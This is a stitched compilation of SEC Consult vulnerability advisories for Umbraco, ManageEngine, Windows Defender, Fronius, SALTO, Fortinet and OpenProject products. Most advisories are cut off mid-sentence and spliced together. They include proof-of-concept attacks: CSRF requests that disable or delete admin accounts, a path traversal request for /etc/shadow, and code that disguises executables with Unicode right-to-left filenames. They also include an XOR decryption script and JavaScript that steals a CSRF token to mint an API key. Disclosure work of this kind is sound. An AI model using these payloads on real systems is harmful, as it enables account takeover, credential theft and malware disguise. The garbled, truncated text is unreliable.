SEC Consult SA-20200123-0 :: Cross-Site Request Forgery (CSRF) in Umbraco CMS
SEC Consult Vulnerability Lab Security Advisory < 20200123-0 >
===
              title: Cross-Site Request Forgery (CSRF)
            product: Umbraco CMS
 vulnerable version: version 8.2.2
      fixed version: version 8.5
         CVE number: CVE-2020-7210
             impact: medium
           homepage: https://umbraco.com/
              found: October 2019
                 by: A. Melnikova (Office Moscow)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
===

Vendor description:
---
"Umbraco 8 is the latest version of Umbraco CMS. It’s the fastest and best
version of Umbraco and a big step forward in regard to making your work with
Umbraco simpler; simpler to extend, simpler to edit, simpler to publish -
simpler to use, simpler to enjoy."

Source: https://umbraco.com/products/umbraco-cms/umbraco-8/


Business recommendation:
---
The vendor provides a patch and users of this product are urged to
immediately upgrade to the latest version available.

SEC Consult recommends performing a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
---
1) Cross-Site Request Forgery (CSRF)
An attacker can use cross-site request forgery to perform arbitrary web
requests with the identity of the victim, without being noticed by the
victim. This attack always requires some sort of user interaction: usually
the victim needs to click on an attacker-prepared link or visit a page under
the control of the attacker. As a result, an attacker is able to
enable/disable or delete accounts. This may lead to a DoS of user accounts.


Proof of concept:
---
1) Cross-Site Request Forgery (CSRF)
In a live attack scenario, the following HTML document would be hosted on a
malicious website controlled by the attacker.

Example 1: HTML-code for disabling user:

  history.pushState('', '', '/')

Request:

  POST /umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds= HTTP/1.1
  Host: [...]
  Cookie:

Response:

  HTTP/1.1 200 OK
  Cache-Control: no-store, must-revalidate, no-cache, max-age=0
  Pragma: no-cache
  Content-Length: 112
  Content-Type: application/json; charset=utf-8
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Set-Cookie:
  Date: Wed, 06 Nov 2019 10:57:45 GMT
  Connection: close

  )]}',
  {"notifications":[{"header":" is now disabled","message":"","type":3}],"message":" is now disabled"}

Example 2: HTML-code for enabling user:

  history.pushState('', '', '/')

Request:

  POST /umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds= HTTP/1.1
  Host: [...]
  Cookie:

Response:

  HTTP/1.1 200 OK
  Cache-Control: no-store, must-revalidate, no-cache, max-age=0
  Pragma: no-cache
  Content-Length: 110
  Content-Type: application/json; charset=utf-8
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Date: Wed, 06 Nov 2019 10:58:12 GMT
  Connection: close

  )]}',
  {"notifications":[{"header":" is now enabled","message":"","type":3}],"message":" is now enabled"}

Example 3: HTML-code for deleting user:

  history.pushState('', '', '/')

Request:

  POST /umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id= HTTP/1.1
  Host: [...]
  Cookie:

Response:

  HTTP/1.1 200 OK
  Cache-Control: no-store, must-revalidate, no-cache, max-age=0
  Pragma: no-cache
  Content-Length: 114
  Content-Type: application/json; charset=utf-8
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Set-Cookie:
  Date: Wed, 06 Nov 2019 10:58:36 GMT
  Connection: close

  )]}',
  {"notifications":[{"header":"User was deleted","message":"","type":3}],"message":"User was deleted"}

As soon as an authenticated victim (admin) visits a website with this HTML
code embedded, the payload is executed in the context of the victim's
session. Although the responses to these requests are not delivered to the
attacker, in many cases it is sufficient to be able to compromise the
integrity of the victim's information stored on the site or to perform
certain, possibly compromising, requests to other sites.


Vulnerable / tested versions:
---
The following version was tested and found to be vulnerable:
* version 8.2.2


Vendor contact timeline:
---
2019-11-13: Contacting vendor through secur...@umbraco.com.
2019-11-13: Requesting encryption keys.
SEC Consult SA-20200122-0 :: Reflected XSS in ZOHO ManageEngine ServiceDeskPlus
SEC Consult Vulnerability Lab Security Advisory < 20200122-0 >
===
              title: Reflected XSS
            product: ZOHO ManageEngine ServiceDeskPlus
 vulnerable version: <= 11.0 Build 11007
      fixed version: 11.0 Build 11010
         CVE number: CVE-2020-6843
             impact: medium
           homepage: https://www.manageengine.com/products/service-desk/
              found: 2019-12-01
                 by: Johannes Kruchem (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
===

Vendor description:
---
"ServiceDesk Plus is a game changer in turning IT teams from daily
fire-fighting to delivering awesome customer service. It provides great
visibility and central control in dealing with IT issues to ensure that
businesses suffer no downtime. For 10 years and running, it has been
delivering smiles to millions of IT folks, end users, and stakeholders alike."

Source: https://www.manageengine.com/products/service-desk/


Business recommendation:
---
The vendor published a patch for ServiceDesk Plus with service pack 11010.
It is recommended to install the patch with the included patcher.

An in-depth security analysis performed by security professionals is highly
advised, as the software may be affected by further security issues.


Vulnerability overview/description:
---
1) Reflected Cross-Site Scripting (CVE-2020-6843)
A parameter of the module called "geti18nkey" reflects unfiltered user input
if it is changed. The corresponding request is frequently sent in the
background once a pre-configured network scan has been started.


Proof of concept:
---
1) Reflected Cross-Site Scripting (CVE-2020-6843)
To reproduce the issue, visit this URL authenticated as administrator:

  http://$IP:8080/CustomReportHandler.do?module=geti18nkey=

How the parameter was found:
1) Authenticate as administrator and add an IP range in Admin -> Networkscan.
2) Click the "play" button next to the created IP range to start the scan.
3) To check the status of a started network scan, frequent requests like
   "http://$IP:8080/CustomReportHandler.do?module=geti18nkey=sdp.admin.network.listview.discoverystatus.scanned=<%someUUID%>"
   are sent to the server.
4) The value of the "key" parameter will be reflected if you change a single
   character. The "sdpcsrfparam" isn't needed in order to trigger the XSS.
5) XSS can thus be exploited by calling
   "http://$IP:8080/CustomReportHandler.do?module=geti18nkey="


Vulnerable / tested versions:
---
The following versions have been tested, which were the latest versions
available at the time of the test:
- 10.5
- 11.0 Build 11007


Vendor contact timeline:
---
2019-12-05: Contacting vendor through ManageEngine Security Response Center
            (MESRC); uploaded security advisory to bugbounty.zoho.com
2019-12-09: Vendor promised to fix the vulnerability.
2020-01-08: Reported issue has been fixed in service pack 11010.
2020-01-22: Public release of security advisory.


Solution:
---
The vendor provides an updated version which should be installed immediately.
https://www.manageengine.com/products/service-desk/download.html

The vendor also provided a link to their readme about the new release:
https://www.manageengine.com/products/service-desk/readme.html#11010


Workaround:
---
None


Advisory URL:
---
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the
evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about
vulnerabilities and valid recommendations about the risk profile of new
technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult SA-20191211-0 :: File Extension Spoofing in Windows Defender Antivirus
SEC Consult Vulnerability Lab Security Advisory < 20191211-0 >
===
              title: File Extension Spoofing
            product: Windows Defender Antivirus
 vulnerable version: 4.18.1908.7-0
      fixed version: Virus Definition Update of 2019/09/30
         CVE number: -
             impact: High
           homepage: https://www.microsoft.com/de-at/windows/comprehensive-security
              found: 2019-09-25
                 by: David Haintz (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
===

Vendor description:
---
"Keep your PC safe with trusted antivirus protection built-in to Windows 10.
Windows Defender Antivirus delivers comprehensive, ongoing and real-time
protection against software threats like viruses, malware and spyware across
email, apps, the cloud and the web."

Source: https://www.microsoft.com/de-at/windows/comprehensive-security


Business recommendation:
---
Update to the latest version of the Windows Defender Antivirus definitions.


Vulnerability overview/description:
---
The vulnerability is based on the file extension spoofing method using the
RTL unicode character to display a spoofed file extension. This method uses
the LTR unicode character, which instructs the following text to be shown in
left-to-right order. Let's assume [LTR] is the LTR unicode character; an
attacker can use this unicode character to fool a user into believing that a
file has a different extension. For example, an attacker may name an
executable file (.exe) 'spoofed-[LTR]gpj.exe', which would be displayed as
'spoofed-exe.jpg' on an LTR-based system. The most important point here is
to write the extension you want to be shown in reverse order, since it will
be shown right-to-left. Combined with the right file icon, an attacker can
imitate an arbitrary file extension. The same goes for other extensions too,
like 'xlsx' for a Microsoft Excel sheet.
During testing it happened that 'xlsx' was typed in the wrong order ('xslx'
instead of 'xlsx', because of the reverse order) and Windows Defender
Antivirus removed the test file while we tried to execute it. As a result,
two files were created, with the exact same executable but with different
fake extensions:

1. spoofed-[RTL]xslx.exe (displayed as 'spoofed-exe.xlsx')
2. spoofed-[RTL]xlsx.exe (displayed as 'spoofed-exe.xslx')

The second one was deleted, while the first one could be executed without
any problem. Therefore, other extensions related to Microsoft Office were
tested as well, but it seems only the xlsx extension had a detection for it.

While the security issue of spoofing the file extension by using the RTL
unicode character (on RTL systems it is the same, just with LTR) is widely
known, it seems to be unknown that Microsoft already started to add detection
mechanisms for this issue. But since it is not implemented for all extensions
and it seems to be implemented in the wrong order, this feature is mostly
unknown.


Proof of concept:
---
For the proof of concept a file has to be renamed in Unicode mode using the
Unicode character '202E' ('\u202E' in C), which stands for RTL. The sample
code is written in C/C++ and uses the unicode API of Windows. A Python PoC
has been made as well.
C/C++:

```c
#include <windows.h>

int main(int argc, char** argv)
{
    wchar_t opath[] = L"test.exe";
    wchar_t npath_ok[] = L"spoofed-\u202Exslx.exe";    // String for filename 'spoofed-exe.xlsx'
    wchar_t npath_wrong[] = L"spoofed-\u202Exlsx.exe"; // String for filename 'spoofed-exe.xslx'

    // Copy 'test.exe' to file shown as 'spoofed-exe.xlsx'
    CopyFileW(opath, npath_ok, FALSE);
    // Copy 'test.exe' to file shown as 'spoofed-exe.xslx'
    CopyFileW(opath, npath_wrong, FALSE);
    return 0;
}
```

Python:

```python
from shutil import copyfile

opath = "test.exe"
npath_ok = "spoofed-\u202Exslx.exe"     # String for filename 'spoofed-exe.xlsx'
npath_wrong = "spoofed-\u202Exlsx.exe"  # String for filename 'spoofed-exe.xslx'

# Copy 'test.exe' to file shown as 'spoofed-exe.xlsx'
copyfile(opath, npath_ok)
# Copy 'test.exe' to file shown as 'spoofed-exe.xslx'
copyfile(opath, npath_wrong)
```

There will be two new files after the execution (as long as 'test.exe'
exists), and the file shown as 'spoofed-exe.xslx' will be deleted while
trying to execute it (or earlier), as shown in figure 1.

[ win-defender-ext-spoofing1.png ]
Figure 1: File gets deleted by Windows Defender Antivirus.

But the file shown as 'spoofed-exe.xlsx' will be executed without any
problem.

[ win-defender-ext-spo
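A detection-side counterpart to the PoC above, added here as an example and not part of the SEC Consult advisory: it flags filenames that contain Unicode bidi control characters and reports the extension a user would see next to the one the OS actually uses, so an upload filter or file-share audit can reject or review such names. The sample filenames are constructed, and the rendering logic is a deliberate simplification of UAX #9 that only models the U+202E override in Latin-script names.

```python
"""Flag filenames whose displayed extension differs from their real one."""
import unicodedata

# Explicit bidi formatting characters and marks. None of them has any
# business being in a filename, so their mere presence is already a signal.
BIDI_CONTROLS = frozenset(
    "\u202A\u202B\u202C\u202D\u202E"   # LRE, RLE, PDF, LRO, RLO
    "\u2066\u2067\u2068\u2069"         # LRI, RLI, FSI, PDI
    "\u200E\u200F\u061C"               # LRM, RLM, ALM
)


def displayed_name(name: str) -> str:
    """Approximate how an LTR file browser draws `name`.

    For Latin-script names only the override matters: text after U+202E up
    to the next U+202C (or the end of the string) is rendered right-to-left,
    i.e. reversed. Every other control is invisible and is dropped. This is
    a simplification of the full bidi algorithm, enough for the spoofing
    pattern described in the advisory.
    """
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202E":
            end = name.find("\u202C", i + 1)
            end = len(name) if end == -1 else end
            segment = [c for c in name[i + 1:end] if c not in BIDI_CONTROLS]
            out.extend(reversed(segment))
            i = end + 1
        else:
            if ch not in BIDI_CONTROLS:
                out.append(ch)
            i += 1
    return "".join(out)


def extension(name: str) -> str:
    """Extension as the OS sees it: text after the last dot, lower-cased."""
    base = name.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def analyze(name: str) -> dict:
    """Return real vs. displayed extension and a verdict for one filename."""
    controls = sorted({unicodedata.name(c, "U+%04X" % ord(c))
                       for c in name if c in BIDI_CONTROLS})
    shown = displayed_name(name)
    real_ext, shown_ext = extension(name), extension(shown)
    return {
        "name": name,
        "displayed": shown,
        "real_ext": real_ext,
        "shown_ext": shown_ext,
        "bidi_controls": controls,
        # Spoofed: the extension the user sees is not the one the OS uses.
        "spoofed": bool(controls) and real_ext != shown_ext,
        # Suspicious: any bidi control at all, even if the extension matches.
        "suspicious": bool(controls),
    }


def scan(filenames) -> list:
    """Return the analyses of every name that should be rejected or reviewed."""
    return [a for a in map(analyze, filenames) if a["suspicious"]]


if __name__ == "__main__":
    samples = [                       # constructed sample filenames
        "spoofed-\u202Exslx.exe",     # shown as spoofed-exe.xlsx
        "spoofed-\u202Exlsx.exe",     # shown as spoofed-exe.xslx
        "spoofed-\u202Egpj.exe",      # shown as spoofed-exe.jpg
        "quarterly-report.pdf",       # clean
    ]
    for a in scan(samples):
        print(f"{a['displayed']!r}: really .{a['real_ext']}, "
              f"spoofed={a['spoofed']} ({', '.join(a['bidi_controls'])})")
```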
SEC Consult SA-20191203-0 :: Multiple vulnerabilities in Fronius Solar Inverter Series
SEC Consult Vulnerability Lab Security Advisory < 20191203-0 >
===
              title: Multiple vulnerabilities
            product: Fronius Solar Inverter Series
 vulnerable version: SW Version <3.14.1 (HM 1.12.1)
      fixed version: >=3.14.1 (vuln 2: 3.12.5 - HM 1.10.5), see solution
                     section below
         CVE number: CVE-2019-19228, CVE-2019-19229
             impact: High
           homepage: https://www.fronius.com
              found: 2018-10-31
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
===

Vendor description:
---
"A passion for new technologies, intensive research and revolutionary
solutions have been shaping the Fronius brand since 1945. As the technology
leader, we find, develop and implement innovative methods to monitor and
control energy for welding technology, photovoltaics and battery charging.
We forge new paths, try something difficult and succeed where others have
failed in achieving what seems to be impossible. [...]"

Source: http://www.fronius.com/en/about-fronius/company-values


Business recommendation:
---
The vendor automatically performed a fleet update of the solar inverters in
the field in order to patch them. Nevertheless, as not all devices could be
reached through such an update, all remaining users are advised to install
the patches provided by the vendor immediately.


Vulnerability overview/description:
---
1) Unencrypted Communication
The whole communication is handled over HTTP. There is no possibility to
activate an HTTPS web service. This vulnerability cannot be fixed by the
vendor in the current solar inverter generation, see the workaround section
below.

2) Authenticated Path Traversal (CVE-2019-19229)
A path traversal attack for authenticated users is possible. This allows
access to the operating system of the device and to information like network
configurations, connections to other hosts, or potentially other sensitive
information.
This vulnerability has been fixed in March 2019 in version 3.12.5 (HM 1.10.5).

The web server runs with "nobody" privileges, but nearly all files on the
file system are world-readable and can be extracted. This can be seen as
another vulnerability, but according to the vendor this cannot be fixed in
the current solar inverter generation.

3) Backdoor Account (CVE-2019-19228)
The web interface has a backdoor user account with the username "today".
This user account has all permissions of all other users ("service", "admin"
and "user") together. As its name suggests, the password for the user
"today" changes every day and seems to be different on other devices with
the same firmware. This means that some device-specific strings (e.g. the
public device-ID) are mixed up every day to generate a new password. This
account is being used by Fronius support in order to access the device upon
request from the user.

The fix for this issue has been split in two parts. The "password reset"
part has been fixed in version 3.14.1 (HM 1.12.1), and the second part,
providing the support account, needs an architectural rework which will be
fixed in a future version (planned for 3.15.1 (HM 1.15.1)).

The passwords for all users of the web interface are stored in plain-text.
This can be seen as another vulnerability and it has been fixed in version
3.14.1 (HM 1.12.1).

4) Outdated and Vulnerable Software Components
Outdated and vulnerable software components were found on the device during
a quick examination. Not all of the outdated components can be fixed by the
vendor in the current solar inverter generation, see the workaround section
below.


Proof of concept:
---
1) Unencrypted Communication
By using an interceptor proxy this vulnerability can be verified in a simple
way.

2) Authenticated Path Traversal (CVE-2019-19229)
By sending the following request to the following endpoint, a path traversal
vulnerability can be triggered:

  http:///admincgi-bin/service.fcgi

Request to read the "/etc/shadow" password file:

┌──
|GET /admincgi-bin/service.fcgi?action=download=../../../../../etc/shadow
└──

As response, the file is returned without line breaks. In this example the
line breaks are added for better readability:

┌──
|HTTP/1.1 200 OK
|Content-Type: appli
SEC Consult SA-20191202-0 :: Multiple Critical Vulnerabilities in SALTO ProAccess SPACE
SEC Consult Vulnerability Lab Security Advisory < 20191202-0 >
===
              title: Multiple Critical Vulnerabilities
            product: SALTO ProAccess SPACE
 vulnerable version: <= v5.5
      fixed version: >= v5.6
         CVE number: CVE-2019-19457, CVE-2019-19458, CVE-2019-19459,
                     CVE-2019-19460
             impact: critical
           homepage: https://www.saltosystems.com/en/
              found: 2019-05-22
                 by: Werner Schober (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
===

Vendor description:
---
"SALTO ProAccess SPACE Software is a powerful access control management tool
that enables you to program access time zones for each user, manage
different calendars and obtain audit trails from each door to see who has
passed through it. The software includes special functions such as automatic
door status changes, anti-passback and relay management. Thanks to its
advanced software features, SALTO ProAccess SPACE is also one of the most
user-friendly and powerful software products for the access control
management of stand-alone wireless devices, and IP online devices in one
converged complete access control platform for the user, keys and doors
management."

Source: http://proaccess-space.saltosystems.com/features/


Business recommendation:
---
The vendor provides a patch which should be installed immediately.

SEC Consult recommends performing a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
---
1. Path Traversal (CVE-2019-19458)
Path traversal vulnerabilities allow attackers access to files and
directories outside the application root through relative file paths in the
user input. During a quick security check, multiple locations in the web
application were identified which allow an attacker to traverse outside of
the application root. The vulnerabilities were identified in the "Data
Export" as well as the "Database Export" functionality.
Those vulnerabilities can, for example, be used to dump the whole database
into the web root by traversing outside of the application root.

2. Arbitrary File Write (CVE-2019-19459)
By further exploiting the path traversal vulnerability inside of the "Data
Export" feature, an attacker is able to traverse into arbitrary paths and
write arbitrary files with arbitrary contents. Examples are writing files
into the web root, or .bat files into the autostart folder. This allows an
attacker to execute arbitrary commands on the server.

3. Stored Cross-Site-Scripting (CVE-2019-19457)
By adding devices to the SALTO network with a JavaScript payload inside of
certain parameters, an attacker is able to permanently embed arbitrary
JavaScript payloads inside of the web application.

4. Webserver running as SYSTEM (Windows Service) by Default (CVE-2019-19460)
The webserver of SALTO ProAccess SPACE is running as a Windows Service with
local SYSTEM permissions by default. This is against the principle of least
privilege. An attacker who is able to exploit the path traversal or the
arbitrary file write vulnerability is basically able to write to every
single path on the file system, because the webserver is running with the
highest privileges available.

5. Authorization Issues
Multiple API calls were identified in the SALTO ProAccess SPACE web
application that should only be callable by highly privileged users.
Nevertheless, by directly calling the API with the OAuth token of a low
privileged user, it was possible to invoke some API calls that shouldn't be
available to that user.

6. Cleartext transmission of sensitive data
The SALTO ProAccess SPACE web application allows its users to create
so-called event streams. Those streams can be used to log events centrally.
The stream is transmitted via TCP/UDP in JSON or CSV format. The stream is
transmitted in cleartext and leaks sensitive data such as who opened which
door and when, including card IDs etc.


Proof of concept:
---
1. Path Traversal (CVE-2019-19458)
The "Data Export" as well as the "Database Export" features in SALTO
ProAccess SPACE allow users to specify a filename for the different exports.
By using special characters inside of the filename, an attacker is able to
traverse outside of the designated export path and place the exports in
arbitrary locations. For example, the following filename can be used in the
database export to store the database backup inside of the webroot:

  ..\..\..\..\SALTO\ProAccess Space\bin\webapp\backup.
Re: SEC Consult SA-20191125-0 :: FortiGuard XOR Encryption in Multiple Fortinet Products
Hi,

we received incorrect version information during the coordination phase,
thus our initial advisory stated that FortiOS v6.0.7 fixes the issue.
Fortinet has just now confirmed that only v6.2.0 includes the patch.
See their advisory: https://fortiguard.com/psirt/FG-IR-18-100

SEC Consult Vulnerability Lab

On 25.11.19 14:43, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20191125-0 >
> ===
>               title: FortiGuard XOR Encryption
>             product: Multiple Fortinet Products (see Vulnerable / tested
>                      versions)
>  vulnerable version: Multiple (see Vulnerable / tested versions)
>       fixed version: Multiple (see Solution)
>          CVE number: CVE-2018-9195
>              impact: High
>            homepage: https://www.fortinet.com
>               found: 2018-05-16
>                  by: Stefan Viehböck (Office Vienna)
>                      SEC Consult Vulnerability Lab
>
>                      An integrated part of SEC Consult
>                      Europe | Asia | North America
>
>                      https://www.sec-consult.com
> ===
>
> Vendor description:
> ---
> "From the start, the Fortinet vision has been to deliver broad, truly
> integrated, high-performance security across the IT infrastructure.
>
> We provide top-rated network and content security, as well as secure access
> products that share intelligence and work together to form a cooperative
> fabric. Our unique security fabric combines Security Processors, an intuitive
> operating system, and applied threat intelligence to give you proven security,
> exceptional performance, and better visibility and control--while providing
> easier administration."
>
> Source: https://www.fortinet.com/corporate/about-us/about-us.html
>
>
> Business recommendation:
> ---
> The vendor provides a patch and users of affected products are urged to
> immediately upgrade to the latest version available.
>
>
> Vulnerability overview/description:
> ---
> Fortinet products, including FortiGate and FortiClient regularly send
> information to Fortinet servers (DNS: guard.fortinet.com) on
> - UDP ports 53, and
> - TCP port 80 (HTTP POST /fgdsvc)
>
> This cloud communication is used for the FortiGuard Web Filter feature
> (https://fortiguard.com/webfilter),
> FortiGuard AntiSpam feature (https://fortiguard.com/updates/antispam)
> and FortiGuard AntiVirus feature (https://fortiguard.com/updates/antivirus).
>
> The messages are encrypted using XOR "encryption" with a static key.
>
>
> The protocol messages contain the following types of information:
>
> **Serial number of the Fortinet product installation** (product type + unique
> ID).
> This information allows an attacker who can **passively monitor** internet
> traffic to:
> - learn which Fortinet products and product types an organization uses
>   (this is valuable for information gathering, see EquationGroup Fortigate
>   exploits)
> - learn which FortiClient installations are part of an organization
> - use the FortiClient serial number as a unique identifier to track an
>   individual as he/she travels the world
>
>
> **Full HTTP URLs of users web surfing activity** (Web Filter feature).
> This information allows an attacker who can **passively monitor** internet
> traffic to spy on users' web surfing activity. In cases where SSL inspection
> is enabled, even the URLs of HTTPS-encrypted communication are sent via this
> protocol, effectively breaking the confidentiality of SSL/TLS.
>
>
> **Unspecified email data** (AntiSpam feature).
> We do not have any further information on what kind of information is sent by
> the AntiSpam feature.
>
>
> **Unspecified AntiVirus data** (AntiVirus feature).
> We do not have any further information on what kind of information is sent by
> the AntiVirus feature.
>
>
> By **intercepting and manipulating** internet traffic an attacker can:
> Manipulate the responses for FortiGuard Web Filter, AntiSpam and AntiVirus
> features.
>
>
> Proof of concept:
> ---
> The following Python 3 script decrypts a FortiGuard message (the static XOR
> key has been removed from this advisory).
>
>
> ```python
> from itertools import cycle
>
> def forti_xor(s1):
>     xor_key = **removed**
>     message = ''.join(chr(c ^ k) for c, k in zip(s1, cycle(xor_key)))
>     return message
>
> r1=bytes.f
SEC Consult SA-20191125-0 :: FortiGuard XOR Encryption in Multiple Fortinet Products
SEC Consult Vulnerability Lab Security Advisory < 20191125-0 >
===
              title: FortiGuard XOR Encryption
            product: Multiple Fortinet Products (see Vulnerable / tested
                     versions)
 vulnerable version: Multiple (see Vulnerable / tested versions)
      fixed version: Multiple (see Solution)
         CVE number: CVE-2018-9195
             impact: High
           homepage: https://www.fortinet.com
              found: 2018-05-16
                 by: Stefan Viehböck (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
===

Vendor description:
---
"From the start, the Fortinet vision has been to deliver broad, truly
integrated, high-performance security across the IT infrastructure.

We provide top-rated network and content security, as well as secure access
products that share intelligence and work together to form a cooperative
fabric. Our unique security fabric combines Security Processors, an intuitive
operating system, and applied threat intelligence to give you proven security,
exceptional performance, and better visibility and control--while providing
easier administration."

Source: https://www.fortinet.com/corporate/about-us/about-us.html


Business recommendation:
---
The vendor provides a patch and users of affected products are urged to
immediately upgrade to the latest version available.


Vulnerability overview/description:
---
Fortinet products, including FortiGate and FortiClient, regularly send
information to Fortinet servers (DNS: guard.fortinet.com) on
- UDP port 53, and
- TCP port 80 (HTTP POST /fgdsvc)

This cloud communication is used for the FortiGuard Web Filter feature
(https://fortiguard.com/webfilter), the FortiGuard AntiSpam feature
(https://fortiguard.com/updates/antispam) and the FortiGuard AntiVirus
feature (https://fortiguard.com/updates/antivirus).

The messages are encrypted using XOR "encryption" with a static key.


The protocol messages contain the following types of information:

**Serial number of the Fortinet product installation** (product type + unique
ID).
This information allows an attacker who can **passively monitor** internet
traffic to:
- learn which Fortinet products and product types an organization uses
  (this is valuable for information gathering, see EquationGroup Fortigate
  exploits)
- learn which FortiClient installations are part of an organization
- use the FortiClient serial number as a unique identifier to track an
  individual as he/she travels the world


**Full HTTP URLs of users' web surfing activity** (Web Filter feature).
This information allows an attacker who can **passively monitor** internet
traffic to spy on users' web surfing activity. In cases where SSL inspection
is enabled, even the URLs of HTTPS-encrypted communication are sent via this
protocol, effectively breaking the confidentiality of SSL/TLS.


**Unspecified email data** (AntiSpam feature).
We do not have any further information on what kind of information is sent by
the AntiSpam feature.


**Unspecified AntiVirus data** (AntiVirus feature).
We do not have any further information on what kind of information is sent by
the AntiVirus feature.


By **intercepting and manipulating** internet traffic an attacker can
manipulate the responses for the FortiGuard Web Filter, AntiSpam and
AntiVirus features.


Proof of concept:
---
The following Python 3 script decrypts a FortiGuard message (the static XOR
key has been removed from this advisory).
```python
from itertools import cycle

def forti_xor(s1):
    xor_key = **removed**
    message = ''.join(chr(c ^ k) for c, k in zip(s1, cycle(xor_key)))
    return message

r1 = bytes.fromhex('6968766f606e776c2d2d21262138475c5b5a475b545e475c6b6a776b646e776c6b6a772b646e776c6b6a776b646e776c6b6a776bbadf04036b6a776c616a846f')
print(repr(forti_xor(r1)))
```

In this case the decrypted message contents are:

'\x02\x02\x01\x04\x04\x00\x00\x00FGVMEV00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00...'

Another example:

'\x02\x01\x02\x04úI\x03\x00FG100D3G\x00\x00\...x00\x00+https://v10.vortex-win.data.microsoft.com/\x00'


Vulnerable / tested versions:
---
The following FortiOS versions are affected according to the vendor:
* FortiOS 6.0.6 and below
* FortiClientWindows 6.0.6 and below
* FortiClientMac 6.2.1 and below

The security advisory of the vendor can be found at:
https://fortiguard.com/psirt/FG-IR-18-100


Vendor contact timeline:
---
2018-05-17: Contacting vendor through ps...@fortinet.com, sending advisory with publi
SEC Consult SA-20191014-0 :: Reflected XSS vulnerability in OpenProject
SEC Consult Vulnerability Lab Security Advisory < 20191014-0 > === title: Reflected XSS vulnerability product: OpenProject vulnerable version: <= 9.0.3, <=10.0.1 fixed version: 9.0.4, 10.0.2 CVE number: CVE-2019-17092 impact: medium homepage: https://www.openproject.org found: 2019-09-27 by: David Haintz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "OpenProject is the leading open source project management software. Support your project management process along the entire project life cycle: From project initiation to closure." Source: https://www.openproject.org/ Business recommendation: Update to the latest version of OpenProject. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: --- 1) Reflected XSS vulnerability (CVE-2019-17092) The project list of OpenProject lacks input validation on data that is output inside an error message. Due to the Content Security Policy inline scripts/styles weren't allowed and the script source was limited to 'self'. To bypass this a JavaScript file was added as attachment to an existing project. This could be used to extract the CSRF token and create a new API key. Proof of concept: - 1) Reflected XSS vulnerability (CVE-2019-17092) Within this proof of concept, two steps are done. First the JavaScript code to be executed is uploaded as an attachment to fulfill the Content Security Policy of 'self'. In the second step the uploaded JavaScript code is executed through the reflected XSS vulnerability by using a script-tag. a) Upload JavaScript code An attacker can upload a JavaScript file as attachment into any project in the default configuration. The attachment can be called directly, but will be downloaded automatically. 
But since the browser does not care whether a file is meant to be
downloaded or displayed when it is loaded from an src attribute, an
attacker can easily use it for the reflected XSS vulnerability. In this
proof of concept the following JavaScript code was uploaded:

    (async () => {
        var csrf_param = document.querySelector('meta[name=csrf-param]').content;
        var csrf_token = document.querySelector('meta[name=csrf-token]').content;
        var req = await fetch("http://$IP/my/generate_api_key", {
            "credentials": "include",
            "headers": {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0",
                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
                "Content-Type": "application/x-www-form-urlencoded",
                "Upgrade-Insecure-Requests": "1"
            },
            "referrer": "http://$IP/my/access_token",
            "body": "_method=post&" + csrf_param + "=" + encodeURI(csrf_token),
            "method": "POST",
            "mode": "cors"
        });
        var resp = await req.text();
        var regex = /(Your access token is:\\)(.*)(\<\/strong\>)/gm;
        var api_key = resp.match(regex)[0];
        api_key = api_key.slice(35, -9);
        alert("Generated new API key: " + api_key);
    })();

This reads the CSRF token and the parameter name (since the name seems
to be configurable) and sends a request to the generate_api_key
functionality. After parsing, the key is shown in a message box, but it
could equally be used for further operations like adding an
administrative user.

b) Craft link
